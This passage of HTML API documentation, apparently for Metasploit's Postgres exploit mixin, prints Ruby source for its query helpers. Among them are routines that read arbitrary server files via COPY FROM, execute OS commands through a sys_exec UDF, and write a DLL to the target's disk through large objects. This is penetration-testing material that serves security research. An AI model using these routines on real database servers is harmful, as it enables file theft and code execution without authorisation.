<span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='id identifier rubyid_print_status'>print_status</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_port'>port</span><span class='embexpr_end'>}</span><span class='tstring_content'> Postgres - Disconnected</span><span class='tstring_end'>&quot;</span></span> <span class='kw'>if</span> <span class='id identifier rubyid_verbose'>verbose</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_password-instance_method">
#<strong>postgres_password</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns The password as provided by the user or a random one if none has been given.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The password as provided by the user or a random one if none has been given.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
340
341
342
343
344
345
346</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 340</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_password'>postgres_password</span>
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PASSWORD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_size'>size</span> <span class='op'>&gt;</span> <span class='int'>0</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PASSWORD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='kw'>else</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>INVALID_</span><span class='tstring_end'>&#39;</span></span> <span class='op'>+</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>6</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='int'>1</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_print_reply-instance_method">
#<strong>postgres_print_reply</strong>(resp = nil, sql = nil) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>If resp is not actually a Connection::Result object, then return :error (but not an actual Exception, thats up to the caller. Otherwise, create a rowset using Rex::Text::Table (if theres more than 0 rows) and return :complete.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 196</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_print_reply'>postgres_print_reply</span><span class='lparen'>(</span><span class='id identifier rubyid_resp'>resp</span><span class='op'>=</span><span class='kw'>nil</span><span class='comma'>,</span><span class='id identifier rubyid_sql'>sql</span><span class='op'>=</span><span class='kw'>nil</span><span class='rparen'>)</span>
<span class='id identifier rubyid_verbose'>verbose</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>VERBOSE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>return</span> <span class='symbol'>:error</span> <span class='kw'>unless</span> <span class='id identifier rubyid_resp'>resp</span><span class='period'>.</span><span class='id identifier rubyid_kind_of?'>kind_of?</span> <span class='const'>Connection</span><span class='op'>::</span><span class='const'>Result</span>
<span class='kw'>if</span> <span class='id identifier rubyid_resp'>resp</span><span class='period'>.</span><span class='id identifier rubyid_rows'>rows</span> <span class='kw'>and</span> <span class='id identifier rubyid_resp'>resp</span><span class='period'>.</span><span class='id identifier rubyid_fields'>fields</span>
<span class='id identifier rubyid_print_status'>print_status</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_peerport'>peerport</span><span class='embexpr_end'>}</span><span class='tstring_content'> Rows Returned: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_resp'>resp</span><span class='period'>.</span><span class='id identifier rubyid_rows'>rows</span><span class='period'>.</span><span class='id identifier rubyid_size'>size</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span> <span class='kw'>if</span> <span class='id identifier rubyid_verbose'>verbose</span>
<span class='kw'>if</span> <span class='id identifier rubyid_resp'>resp</span><span class='period'>.</span><span class='id identifier rubyid_rows'>rows</span><span class='period'>.</span><span class='id identifier rubyid_size'>size</span> <span class='op'>&gt;</span> <span class='int'>0</span>
<span class='id identifier rubyid_tbl'>tbl</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='op'>::</span><span class='const'>Table</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Indent</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='int'>4</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Header</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Query Text: &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sql'>sql</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Columns</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_resp'>resp</span><span class='period'>.</span><span class='id identifier rubyid_fields'>fields</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='lbrace'>{</span><span class='op'>|</span><span class='id identifier rubyid_x'>x</span><span class='op'>|</span> <span class='id identifier rubyid_x'>x</span><span class='period'>.</span><span class='id identifier rubyid_name'>name</span><span class='rbrace'>}</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_resp'>resp</span><span class='period'>.</span><span class='id identifier rubyid_rows'>rows</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='lbrace'>{</span><span class='op'>|</span><span class='id identifier rubyid_row'>row</span><span class='op'>|</span> <span class='id identifier rubyid_tbl'>tbl</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_row'>row</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_x'>x</span><span class='op'>|</span> <span class='id identifier rubyid_x'>x</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>?</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>NIL</span><span class='tstring_end'>&quot;</span></span> <span class='op'>:</span> <span class='id identifier rubyid_x'>x</span> <span class='rbrace'>}</span> <span class='rbrace'>}</span>
<span class='id identifier rubyid_print_line'>print_line</span><span class='lparen'>(</span><span class='id identifier rubyid_tbl'>tbl</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='symbol'>:complete</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_query-instance_method">
#<strong>postgres_query</strong>(sql = nil, doprint = false) &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>If not currently connected, attempt to connect. If an error is encountered while executing the query, it will return with :error ; otherwise, it will return with :complete.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>sql</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>nil</tt>)</em>
&mdash;
<div class='inline'>
<p>The query to run</p>
</div>
</li>
<li>
<span class='name'>doprint</span>
<span class='type'>(<tt>Boolean</tt>)</span>
<em class="default">(defaults to: <tt>false</tt>)</em>
&mdash;
<div class='inline'>
<p>Whether the result should be printed</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 153</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_query'>postgres_query</span><span class='lparen'>(</span><span class='id identifier rubyid_sql'>sql</span><span class='op'>=</span><span class='kw'>nil</span><span class='comma'>,</span><span class='id identifier rubyid_doprint'>doprint</span><span class='op'>=</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>=</span> <span class='id identifier rubyid_postgres_login'>postgres_login</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_result'>result</span> <span class='op'>==</span> <span class='symbol'>:connected</span>
<span class='kw'>return</span> <span class='lbrace'>{</span> <span class='label'>conn_error:</span> <span class='id identifier rubyid_result'>result</span> <span class='rbrace'>}</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span>
<span class='id identifier rubyid_sql'>sql</span> <span class='op'>||=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SQL</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_peerport'>peerport</span><span class='embexpr_end'>}</span><span class='tstring_content'> Postgres - querying with &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sql'>sql</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_resp'>resp</span> <span class='op'>=</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_query'>query</span><span class='lparen'>(</span><span class='id identifier rubyid_sql'>sql</span><span class='rparen'>)</span>
<span class='kw'>rescue</span> <span class='const'>RuntimeError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='kw'>case</span> <span class='id identifier rubyid_sql_error_msg'>sql_error_msg</span> <span class='op'>=</span> <span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\t</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span> <span class='comment'># Deal with some common errors
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>C42601</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_sql_error_msg'>sql_error_msg</span> <span class='op'>+=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'> Invalid SQL Syntax: &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sql'>sql</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>C42P01</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_sql_error_msg'>sql_error_msg</span> <span class='op'>+=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'> Table does not exist: &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sql'>sql</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>C42703</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_sql_error_msg'>sql_error_msg</span> <span class='op'>+=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'> Column does not exist: &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sql'>sql</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>C42883</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_sql_error_msg'>sql_error_msg</span> <span class='op'>+=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'> Function does not exist: &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sql'>sql</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>else</span> <span class='comment'># Let the user figure out the rest.
</span> <span class='kw'>if</span> <span class='id identifier rubyid_e'>e</span> <span class='op'>==</span> <span class='const'>Timeout</span><span class='op'>::</span><span class='const'>Error</span>
<span class='id identifier rubyid_sql_error_msg'>sql_error_msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Execution expired</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_sql_error_msg'>sql_error_msg</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_sql_error_msg'>sql_error_msg</span> <span class='op'>=</span> <span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_inspect'>inspect</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_sql_error_msg'>sql_error_msg</span> <span class='op'>+=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'> SQL statement &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sql'>sql</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39; returns </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_inspect'>inspect</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:sql_error</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_sql_error_msg'>sql_error_msg</span><span class='rbrace'>}</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_postgres_print_reply'>postgres_print_reply</span><span class='lparen'>(</span><span class='id identifier rubyid_resp'>resp</span><span class='comma'>,</span><span class='id identifier rubyid_sql'>sql</span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='id identifier rubyid_doprint'>doprint</span>
<span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:complete</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_resp'>resp</span><span class='rbrace'>}</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_read_textfile-instance_method">
#<strong>postgres_read_textfile</strong>(filename) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>This presumes the user has rights to both the file and to create a table. If not, <span class='object_link'><a href="#postgres_query-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_query (method)">#postgres_query</a></span> will return an error (usually :sql_error), and it should be dealt with by the caller.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
351
352
353
354
355
356
357
358
359
360
361
362</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 351</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_read_textfile'>postgres_read_textfile</span><span class='lparen'>(</span><span class='id identifier rubyid_filename'>filename</span><span class='rparen'>)</span>
<span class='comment'># Check for temp table creation privs first.
</span> <span class='kw'>unless</span> <span class='id identifier rubyid_postgres_has_database_privilege'>postgres_has_database_privilege</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>TEMP</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span><span class='lparen'>(</span><span class='lbrace'>{</span><span class='symbol'>:sql_error</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Insufficient privileges for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>USERNAME</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> on </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATABASE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_temp_table_name'>temp_table_name</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>10</span><span class='rparen'>)</span><span class='op'>+</span><span class='int'>6</span><span class='rparen'>)</span>
<span class='id identifier rubyid_read_query'>read_query</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>%Q{</span><span class='tstring_content'>CREATE TEMP TABLE </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_temp_table_name'>temp_table_name</span><span class='embexpr_end'>}</span><span class='tstring_content'> (INPUT TEXT);
COPY </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_temp_table_name'>temp_table_name</span><span class='embexpr_end'>}</span><span class='tstring_content'> FROM &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;;
SELECT * FROM </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_temp_table_name'>temp_table_name</span><span class='embexpr_end'>}</span><span class='tstring_end'>}</span></span>
<span class='kw'>return</span> <span class='id identifier rubyid_postgres_query'>postgres_query</span><span class='lparen'>(</span><span class='id identifier rubyid_read_query'>read_query</span><span class='comma'>,</span><span class='kw'>true</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_sys_exec-instance_method">
#<strong>postgres_sys_exec</strong>(cmd) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<div class="note deprecated"><strong>Deprecated.</strong> <div class='inline'>
<p>Just get a real shell instead</p>
</div></div>
<p>This presumes the pg_temp.sys_exec() udf has been installed, almost certainly by postgres_create_sys_exec()</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
392
393
394
395
396
397
398
399
400
401</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 392</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_sys_exec'>postgres_sys_exec</span><span class='lparen'>(</span><span class='id identifier rubyid_cmd'>cmd</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Attempting to Execute: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_q'>q</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select pg_temp.sys_exec(&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_resp'>resp</span> <span class='op'>=</span> <span class='id identifier rubyid_postgres_query'>postgres_query</span><span class='lparen'>(</span><span class='id identifier rubyid_q'>q</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:sql_error</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:sql_error</span><span class='rbracket'>]</span>
<span class='kw'>return</span> <span class='kw'>false</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='kw'>true</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_upload_binary_data-instance_method">
#<strong>postgres_upload_binary_data</strong>(data, remote_fname = nil) &#x21d2; <tt>nil</tt>, <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Writes data to disk on the target server.</p>
<p>This is accomplished in 5 steps:</p>
<ol><li>
<p>Create a new object with “select lo_create(-1)”</p>
</li><li>
<p>Delete any resulting rows in pg_largeobject table. On 8.x and older, postgres inserts rows as a result of the call to lo_create. Deleting them here approximates the state on 9.x where no such insert happens.</p>
</li><li>
<p>Break the data into LOBLOCKSIZE-byte chunks.</p>
</li><li>
<p>Insert each of the chunks as a row in pg_largeobject</p>
</li><li>
<p>Select lo_export to write the file to disk</p>
</li></ol>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>data</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Raw binary to write to disk</p>
</div>
</li>
<li>
<span class='name'>remote_fname</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>nil</tt>)</em>
&mdash;
<div class='inline'>
<p>Name of the file on the remote server where the data will be stored. Default is "&lt;random&gt;.dll"</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>if any part of this process failed</p>
</div>
</li>
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>if everything went as planned, the name of the file we dropped. This is really only useful if <code>remote_fname</code> is nil</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 433</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_upload_binary_data'>postgres_upload_binary_data</span><span class='lparen'>(</span><span class='id identifier rubyid_data'>data</span><span class='comma'>,</span> <span class='id identifier rubyid_remote_fname'>remote_fname</span><span class='op'>=</span><span class='kw'>nil</span><span class='rparen'>)</span>
<span class='id identifier rubyid_remote_fname'>remote_fname</span> <span class='op'>||=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='op'>::</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>.dll</span><span class='tstring_end'>&quot;</span></span>
<span class='comment'># From the Postgres documentation:
</span> <span class='comment'># SELECT lo_creat(-1); -- returns OID of new, empty large object
</span> <span class='comment'># Doing it this way instead of calling lo_create with a random number
</span> <span class='comment'># ensures that we don&#39;t accidentally hit the id of a real object.
</span> <span class='id identifier rubyid_resp'>resp</span> <span class='op'>=</span> <span class='id identifier rubyid_postgres_query'>postgres_query</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select lo_creat(-1)</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>unless</span> <span class='id identifier rubyid_resp'>resp</span> <span class='kw'>and</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:complete</span><span class='rbracket'>]</span> <span class='kw'>and</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:complete</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_rows'>rows</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_error'>print_error</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to get a new loid</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>return</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_oid'>oid</span> <span class='op'>=</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:complete</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_rows'>rows</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span>
<span class='id identifier rubyid_queries'>queries</span> <span class='op'>=</span> <span class='lbracket'>[</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>delete from pg_largeobject where loid=</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_oid'>oid</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span> <span class='rbracket'>]</span>
<span class='comment'># Break the data into smaller chunks that can fit in the size allowed in
</span> <span class='comment'># the pg_largeobject data column.
</span> <span class='comment'># From the postgres documentation:
</span> <span class='comment'># &quot;The amount of data per page is defined to be LOBLKSIZE (which is
</span> <span class='comment'># currently BLCKSZ/4, or typically 2 kB).&quot;
</span> <span class='comment'># Empirically, it seems that 8kB is fine on 9.x, but we play it safe and
</span> <span class='comment'># stick to 2kB.
</span> <span class='id identifier rubyid_chunks'>chunks</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='kw'>while</span> <span class='lparen'>(</span><span class='lparen'>(</span><span class='id identifier rubyid_c'>c</span> <span class='op'>=</span> <span class='id identifier rubyid_data'>data</span><span class='period'>.</span><span class='id identifier rubyid_slice!'>slice!</span><span class='lparen'>(</span><span class='int'>0</span><span class='op'>..</span><span class='int'>2047</span><span class='rparen'>)</span><span class='rparen'>)</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_c'>c</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>&gt;</span> <span class='int'>0</span><span class='rparen'>)</span>
<span class='id identifier rubyid_chunks'>chunks</span><span class='period'>.</span><span class='id identifier rubyid_push'>push</span> <span class='id identifier rubyid_c'>c</span>
<span class='kw'>end</span>
